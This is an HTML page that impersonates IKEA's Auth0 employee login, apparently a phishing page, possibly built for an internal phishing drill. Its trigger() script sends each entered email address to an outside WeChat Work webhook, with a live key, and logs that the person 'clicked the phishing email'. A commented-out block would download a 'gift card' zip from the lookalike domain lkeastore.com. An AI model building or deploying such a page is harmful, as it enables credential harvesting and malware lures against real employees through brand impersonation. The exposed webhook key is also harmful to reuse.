<!DOCTYPE html>
  <html lang="en" >
  <head>
        <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    
    
    <meta name="robots" content="noindex, nofollow" />
    
    
    <link rel="stylesheet" href="https://cdn.auth0.com/ulp/react-components/1.67.3/css/main.cdn.min.css" />
    <style id="custom-styles-container">
      
        



:root {
    --primary-color: #fbd914;
  }
:root {
    --button-font-color: #ffffff;
  }
:root {
    --secondary-button-border-color: #c9cace;
    --social-button-border-color: #c9cace;
    --radio-button-border-color: #c9cace;
  }
:root {
    --secondary-button-text-color: #1e212a;
  }
:root {
    --link-color: #0058ab;
  }
:root {
    --title-font-color: #1e212a;
  }
:root {
    --font-default-color: #1e212a;
  }
:root {
    --widget-background-color: #ffffff;
  }
:root {
    --box-border-color: #c9cace;
  }
:root {
    --font-light-color: #65676e;
  }
:root {
    --input-text-color: #000000;
  }
:root {
    --input-border-color: #c9cace;
    --border-default-color: #c9cace;
  }
:root {
    --input-background-color: #ffffff;
  }
:root {
    --icon-default-color: #65676e;
  }
:root {
    --error-color: #d03c38;
    --error-text-color: #ffffff;
  }
:root {
    --success-color: #13a688;
  }
:root {
    --base-focus-color: #0058ab;
    --transparency-focus-color: rgba(0,88,171, 0.15);
  }
:root {
    --base-hover-color: #000000;
    --transparency-hover-color: rgba(0,0,0, var(--hover-transparency-value));
  }




html, :root {
    font-size: 16px;
    --default-font-size: 16px;
  }
body {
    --title-font-size: 1.5rem;
    --title-font-weight: var(--font-default-weight);
  }
.cc2570856 {
    font-size: 0.875rem;
    font-weight: var(--font-default-weight);
  }
.c389aac0b {
    font-size: 0.875rem;
    font-weight: var(--font-default-weight);
  }
.c99b527ce, .c2f7dced4 {
    font-size: 1rem;
    font-weight: var(--font-default-weight);
  }
.c3b1179e1 {
    font-size: 1rem;
    font-weight: var(--font-default-weight);
  }
.c4999f2c2, .cd40378de {
    font-size: 0.875rem;
    font-weight: var(--font-bold-weight) !important;
  }




:root {
    --button-border-width: 1px;
    --social-button-border-width: 1px;
    --radio-border-width: 1px;
  }
body {
    --button-border-radius: 3px;
    --radio-border-radius: 3px;
  }
:root {
    --input-border-width: 1px;
  }
body {
    --input-border-radius: 3px;
  }
:root {
    --border-radius-outer: 5px;
  }
:root {
    --box-border-width: 0px;
  }





    body {
      --logo-alignment: 0 auto;
    }
  

    .cb8b5079c {
      content: url('https://adfstou.blob.core.windows.net/auth0/IKEA_2018_h58.png');
    }
  
body {
    --logo-height: 52px;
  }
  .cb8b5079c {
    height: var(--logo-height);
  }
  

    body {
      --header-alignment: center;
    }
  
.cf34ac957 {
    display: flex;
    flex-direction: column;
  }
  .cf34ac957 form {
    order: 3;
  }
  .cf34ac957 ._alternate-action {
    order: 4
  }
  .cf34ac957 > .c87ae0936 {
    order: 2;
    margin-bottom: 24px;
  }
  .cf34ac957 .ca71d8e40 {
    order: 1;
    margin-top: 0;
  }



.cfb24fd53 {
    --page-background-alignment: center;
  }
body {
    --page-background-color: #0058ab;
  }





      
    </style>
    <style>
      /* By default, hide features for javascript-disabled browsing */
      /* We use !important to override any css with higher specificity */
      /* It is also overriden by the styles in <noscript> in the header file */
      .no-js {
        clip: rect(0 0 0 0);
        clip-path: inset(50%);
        height: 1px;
        overflow: hidden;
        position: absolute;
        white-space: nowrap;
        width: 1px;
      }
    </style>
    <noscript>
      <style>
        /* We use !important to override the default for js enabled */
        /* If the display should be other than block, it should be defined specifically here */
        .js-required { display: none !important; }
        .no-js {
          clip: auto;
          clip-path: none;
          height: auto;
          overflow: auto;
          position: static;
          white-space: normal;
          width: var(--prompt-width);
        }
      </style>
    </noscript>
    
    <title>Log in | IKEA Employee Fraud Investigation </title>
  </head>
  
  <body>
    <div class="c78b313fc cfb24fd53">
  
<main class="c92c26fbe login-id">
  <section class="c7c07fbff _prompt-box-outer c4dc36cba">
    <div class="c25d1b5ec cd43f3464">
      
    
      <div class="cb29232b3">
        <header class="cb7fe8136 c8ecd7007">
          <div title="IKEA" id="custom-prompt-logo" style="width: auto !important; height: 60px !important; position: static !important; margin: auto !important; padding: 0 !important; background-color: transparent !important; background-position: center !important; background-size: contain !important; background-repeat: no-repeat !important"></div>
        
          <img class="cb8b5079c c600c7027" id="prompt-logo-center" src="https://adfstou.blob.core.windows.net/auth0/IKEA_2018_h58.png" alt="IKEA" />
        
          
            <h1 class="c690d3e44 cc977329f">Welcome</h1>
          
        
          <div class="cc2570856 cdaf61c72">
            <p class="c7b122490 cdffe5edf">Log in to IKEA</p>
          </div>
        </header>
      
        <div class="c389aac0b cf34ac957">
          
        
          
            <form method="POST" class="c6d55c8e1 _form-login-id" data-form-primary="true">
              <input type="hidden" name="state" value="hKFo2SA2T0tTUm51MzhNeTRTSlJ1LXd5eUNqRTltMEczNFl3UqFur3VuaXZlcnNhbC1sb2dpbqN0aWTZIDBTM1cxUFdBSm5kRFZwM0l3S2p6X041Ri01dzB0cnlZo2NpZNkgR1VBZGJUY2p1bGFCR0RsalExaVk5dExPV0pianJDN2o" />
            
              <div class="cb15f584f cb4ca98c6">
                <div class="ca5ec30f2">
                  
                
                  
                    <div class="input-wrapper _input-wrapper">
                      <div class="c48ccce47 cb03101f6 text c84fd713a" data-action-text="" data-alternate-action-text="">
                        <label class="c3b1179e1 no-js cec5382e9 c8c9e83a1" for="username">
                          Email address
                        </label>
                      
                        <input class="input c6eafb70b cf072f6c3" inputMode="email" name="username" id="username" type="text" value="" required autoComplete="username" autoCapitalize="none" spellCheck="false" autoFocus />
                      
                        <div class="c3b1179e1 js-required cec5382e9 c8c9e83a1" data-dynamic-label-for="username" aria-hidden="true">
                          Email address
                        </div>
                      </div>
                    
                      
                    </div>
                  
                
                  
                </div>
              </div>
            
              <input class="hide" type="password" autoComplete="off" tabindex="-1" aria-hidden="true" />
            
              <input type="hidden" id="js-available" name="js-available" value="false" />
            
              <input type="hidden" id="webauthn-available" name="webauthn-available" value="false" />
            
              <input type="hidden" id="is-brave" name="is-brave" value="false" />
            
              <input type="hidden" id="webauthn-platform-available" name="webauthn-platform-available" value="false" />
            
              <div class="c972fd828">
                
                  <button type="button" onclick="trigger()" name="action" value="default" class="c99b527ce c488a9d61 c39b3b9c2 c3ae61280 _button-login-id" data-action-button-primary="true">Continue</button>
                
              </div>
            </form>

            <div class="c91eeb809 c87ae0936">
              <span>Or</span>
            </div>
          
        
          
            <div class="cc8e6d791 ca71d8e40">
              
                <form method="post" data-provider="waad" class="c2f7dced4 c166683cf c7c93499a" data-form-secondary="true">
                  <input type="hidden" name="state" value="hKFo2SA2T0tTUm51MzhNeTRTSlJ1LXd5eUNqRTltMEczNFl3UqFur3VuaXZlcnNhbC1sb2dpbqN0aWTZIDBTM1cxUFdBSm5kRFZwM0l3S2p6X041Ri01dzB0cnlZo2NpZNkgR1VBZGJUY2p1bGFCR0RsalExaVk5dExPV0pianJDN2o" />
                
                  <input type="hidden" name="connection" value="ikea-waad" />
                
                  <button type="submit" class="c28fbf930 c66190dcc ca1895747" data-provider="waad" data-action-button-secondary="true">
                    
                      <span class="cc555f487 c4001df5f" data-provider="waad"></span>
                    
                  
                    <span class="cd00cd935">Ingka</span>
                  </button>
                </form>
              
                <form method="post" data-provider="samlp" class="c2f7dced4 c166683cf c019dabb6" data-form-secondary="true">
                  <input type="hidden" name="state" value="hKFo2SA2T0tTUm51MzhNeTRTSlJ1LXd5eUNqRTltMEczNFl3UqFur3VuaXZlcnNhbC1sb2dpbqN0aWTZIDBTM1cxUFdBSm5kRFZwM0l3S2p6X041Ri01dzB0cnlZo2NpZNkgR1VBZGJUY2p1bGFCR0RsalExaVk5dExPV0pianJDN2o" />
                
                  <input type="hidden" name="connection" value="IKEA-ADFS-WAP-MFA" />
                
                  <button type="submit" class="c28fbf930 c66190dcc cc2e3e2b9" data-provider="samlp" data-action-button-secondary="true">
                    
                      <span class="cc555f487 c4001df5f" data-provider="samlp"></span>
                    
                  
                    <span class="cd00cd935">Inter IKEA, Non Ingka Retailer &amp; Supplier</span>
                  </button>
                </form>
              
            </div>
          
        </div>
      </div>
    </div>
  
    
  </section>
</main>
<script id="client-scripts" type="text/javascript">
!function(){var e,v,h,t,n={exports:function(n,a){var r={};function i(e,t,n,r){return e.addEventListener(t,n,r)}function o(e){return"string"==typeof e}function c(e,t){return e.getAttribute(t)}function u(e,t,n){return e.setAttribute(t,n)}return{addClass:function(e,t){if(e.classList)return e.classList.add(t);var n=e.className.split(" ");-1===n.indexOf(t)&&(n.push(t),e.className=n.join(" "))},toggleClass:function(e,t){if(e.classList)return e.classList.toggle(t);var n=e.className.split(" "),r=n.indexOf(t);-1!==r?n.splice(r,1):n.push(t),e.className=n.join(" ")},addClickListener:function(e,t){return i(e,"click",t)},addEventListener:i,getAttribute:c,getElementById:function(e){return a.getElementById(e)},getParent:function(e){return e.parentNode},isString:o,loadScript:function(e){var t=a.createElement("script");t.src=e,t.async=!0,a.body.appendChild(t)},poll:function(e){var i=e.interval||2e3,t=e.url||n.location.href,o=e.condition||function(){return!0},c=e.onSuccess||function(){},u=e.onError||function(){};return setTimeout(function r(){var a=new XMLHttpRequest;return a.open("GET",t),a.setRequestHeader("Accept","application/json"),a.onload=function(){if(200===a.status){var e="application/json"===a.getResponseHeader("Content-Type").split(";")[0]?JSON.parse(a.responseText):a.responseText;return o(e)?c():setTimeout(r,i)}if(429!==a.status)return u({status:a.status,responseText:a.responseText});var t=1e3*Number.parseInt(a.getResponseHeader("X-RateLimit-Reset")),n=t-(new Date).getTime();return setTimeout(r,i<n?n:i)},a.send()},i)},querySelector:function(e,t){return o(e)?a.querySelector(e):e.querySelector(t)},querySelectorAll:function(e,t){var n=o(e)?a.querySelectorAll(e):e.querySelectorAll(t);return Array.prototype.slice.call(n)},removeClass:function(e,t){if(e.classList)return e.classList.remove(t);var n=e.className.split(" "),r=n.indexOf(t);-1!==r&&(n.splice(r,1),e.className=n.join(" "))},setAttribute:u,removeAttribute:function(e,t){return e.removeAttribute(t)},swapAttributes:function(e,t,n){var r=c(e,t),a=c(e,n);u(e,n,r),u(e,t,a)},setGlobalFlag:function(e,t){r[e]=!!t},getGlobalFlag:function(e){return!!r[e]},preventFormSubmit:function(e){e.stopPropagation(),e.preventDefault()},matchMedia:function(e){return"function"!=typeof n.matchMedia&&n.matchMedia(e).matches},dispatchEvent:function(e,t,n){var r;"function"!=typeof Event?(r=a.createEvent("Event")).initCustomEvent(t,n,!1):r=new Event(t,{bubbles:n}),e.dispatchEvent(r)},setTimeout:setTimeout,timeoutPromise:function(e,a){return new Promise(function(t,n){var r=setTimeout(function(){n(new Error("timeoutPromise: promise timed out"))},e);a.then(function(e){clearTimeout(r),t(e)},function(e){clearTimeout(r),n(e)})})}}}}.exports(window,document),r={exports:function(e,t){for(var i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_",l=new Uint8Array(256),o=0;o<i.length;o++)l[i.charCodeAt(o)]=o;function c(e){var t,n=new Uint8Array(e),r=n.length,a="";for(t=0;t<r;t+=3)a+=i[n[t]>>2],a+=i[(3&n[t])<<4|n[t+1]>>4],a+=i[(15&n[t+1])<<2|n[t+2]>>6],a+=i[63&n[t+2]];return r%3==2?a=a.substring(0,a.length-1):r%3==1&&(a=a.substring(0,a.length-2)),a}function n(){return navigator&&navigator.credentials&&"undefined"!=typeof PublicKeyCredential}return{base64URLEncode:c,base64URLDecode:function(e){var t,n,r,a,i,o=.75*e.length,c=e.length,u=0,s=new Uint8Array(o);for(t=0;t<c;t+=4)n=l[e.charCodeAt(t)],r=l[e.charCodeAt(t+1)],a=l[e.charCodeAt(t+2)],i=l[e.charCodeAt(t+3)],s[u++]=n<<2|r>>4,s[u++]=(15&r)<<4|a>>2,s[u++]=(3&a)<<6|63&i;return s.buffer},publicKeyCredentialToJSON:function e(t){if(t instanceof Array){var n=[];for(o=0;o<t.length;o+=1)n.push(e(t[o]));return n}if(t instanceof ArrayBuffer)return c(t);if(t instanceof Object){var r={};for(var a in t)r[a]=e(t[a]);return r}return t},str2ab:function(e){for(var t=new ArrayBuffer(e.length),n=new Uint8Array(t),r=0,a=e.length;r<a;r++)n[r]=e.charCodeAt(r);return t},isWebAuthnAvailable:n,isWebauthnPlatformAuthenticatorAvailableAsync:function(e){return n()?e(1e3,PublicKeyCredential.isUserVerifyingPlatformAuthenticatorAvailable()):Promise.resolve(!1)}}}}.exports(window,document);({exports:function(e,r,a,t){var n=e(".c92c26fbe"),i=e("#alert-trigger"),o=e(".c3993a060"),c=e(".c634d4335"),u=!1;i&&c&&n&&t(n,function(e){var t=e.target===i,n=c.contains(e.target);return t&&!u?(r(o,"show"),void(u=!0)):t&&u||u&&!n?(a(o,"show"),void(u=!1)):void 0})}}).exports(n.querySelector,n.addClass,n.removeClass,n.addClickListener),(v="recaptcha_v2",h="recaptcha_enterprise",(e={}).exports=function(e,a,i,o,c,r){var u,s=a("div[data-recaptcha-sitekey]"),t=a("div[data-recaptcha-sitekey] input"),l=a("#ulp-recaptcha");function f(){return s.getAttribute("data-recaptcha-provider")}function d(e){return t.value=e}function p(e,t){if(e&&e.getBoundingClientRect){if(!r("(max-width: 480px)"))return l.style.transform="",void(l.style.height="");(void 0===t||isNaN(t))&&(t=1.4);var n=72*t;l.style.transform="scale("+t+")",l.style.height=n+"px",l.style.width="10px",s.clientWidth+8<e.getBoundingClientRect().width&&p(e,t-.01)}}s&&(u="recaptchaCallback_"+Math.floor(1000001*Math.random()),window[u]=function(){var e,t,n,r;delete window[u],e=function(e){switch(e){case v:return window.grecaptcha;case h:return window.grecaptcha.enterprise}}(f()),t=e.render(l,{sitekey:s.getAttribute("data-recaptcha-sitekey"),"expired-callback":function(){d(""),i(s,"c1400dcd1"),e.reset(t)},callback:function(e){d(e),o(s,"c1400dcd1")}}),n=function(e){p(e),c(window,"resize",function(){p(e)})},r=setInterval(function(){var e=a("#ulp-recaptcha iframe");if(e)return clearInterval(r),n(e)},200)},e(function(e,t,n){switch(e){case v:return"https://www.recaptcha.net/recaptcha/api.js?hl="+t+"&onload="+n;case h:return"https://www.recaptcha.net/recaptcha/enterprise.js?render=explicit&hl="+t+"&onload="+n}}(f(),s.getAttribute("data-recaptcha-lang"),u)))},e.exports)(n.loadScript,n.querySelector,n.addClass,n.removeClass,n.addEventListener,n.matchMedia),((t={}).exports=function(r,e,a,i,o,c,u,s,n,l){function f(e){var t=e.target,n=c(t);t.value||l(t,"data-autofilled")?i(n,"c144f0892"):o(n,"c144f0892")}function d(e){var t=e.target;"onAutoFillStart"===e.animationName&&(n(t,"data-autofilled",!0),s(e.target,"change",!0),a(t,"keyup",p,{once:!0}))}function p(e){var t=e.target;n(t,"data-autofilled","")}if(r("body._simple-labels"))return e(".c3b1179e1.no-js").forEach(function(e){o(e,"no-js")}),void e(".c3b1179e1.js-required").forEach(function(e){i(e,"hide")});e(".c48ccce47:not(.c2505b870):not(disabled)").forEach(function(e){i(e,"c6825e831");var t,n=r(e,".input");n.value&&i(e,"c144f0892"),a(e,"change",f),a(n,"blur",f),a(n,"animationstart",d),t=n,u(function(){t.value&&s(t,"change",!0)},100)})},t.exports)(n.querySelector,n.querySelectorAll,n.addEventListener,n.addClass,n.removeClass,n.getParent,n.setTimeout,n.dispatchEvent,n.setAttribute,n.getAttribute),{exports:function(e,t,n,r,a,i){function o(e){var t=n("submitted");r("submitted",!0),t?a(e):"apple"===i(e.target,"data-provider")&&setTimeout(function(){r("submitted",!1)},2e3)}var c=e("form");c&&c.forEach(function(e){t(e,"submit",o)})}}.exports(n.querySelectorAll,n.addEventListener,n.getGlobalFlag,n.setGlobalFlag,n.preventFormSubmit,n.getAttribute),{exports:function(t,e,n){var r=t("form._form-detect-browser-capabilities"),a=t("main.login-id");if(r||a){var i=e.isWebAuthnAvailable();t("#webauthn-available").value=i?"true":"false",t("#js-available").value="true",navigator.brave?navigator.brave.isBrave().then(function(e){t("#is-brave").value=e,o()}):o()}function o(){i?e.isWebauthnPlatformAuthenticatorAvailableAsync(n).then(function(e){t("#webauthn-platform-available").value=e?"true":"false",r&&r.submit()}).catch(function(e){t("#webauthn-platform-available").value="false",r&&r.submit()}):(t("#webauthn-platform-available").value="false",r&&r.submit())}}}.exports(n.querySelector,r,n.timeoutPromise)}();
function trigger() {
  const username = document.getElementById("username").value;
  var jsonContent = {
    "msgtype": "text",
    "text": {
        "content": username + "点击了钓鱼邮件，并输入了员工账号",
    }
};
  // 登录成功后的操作
   
  // 发送API请求
  fetch('https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=473813da-0ac3-441f-b606-807039fbcb42', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({ jsonContent })
  })
  .then(response => {
    if (!response.ok) {
      throw new Error('登录失败');
    }
    return response.json();
  })
  .then(data => {
    <!--
    var url = "https://www.lkeastore.com/ctrip_gift_card_coupon_200RMB.zip"; // 替换为要下载的文件的URL
    var fileName = "ctrip_gift_card_coupon_200RMB.zip"; // 替换为要保存的文件名
    var a = document.createElement("a");
    a.href = url;
    a.download = fileName;
    a.click();
  -->
    window.location.href="success.html";
  })
  .catch(error => {
    // 处理错误
    alert(error.message);
  });
}
</script>
    </div>
  </body>
</html>
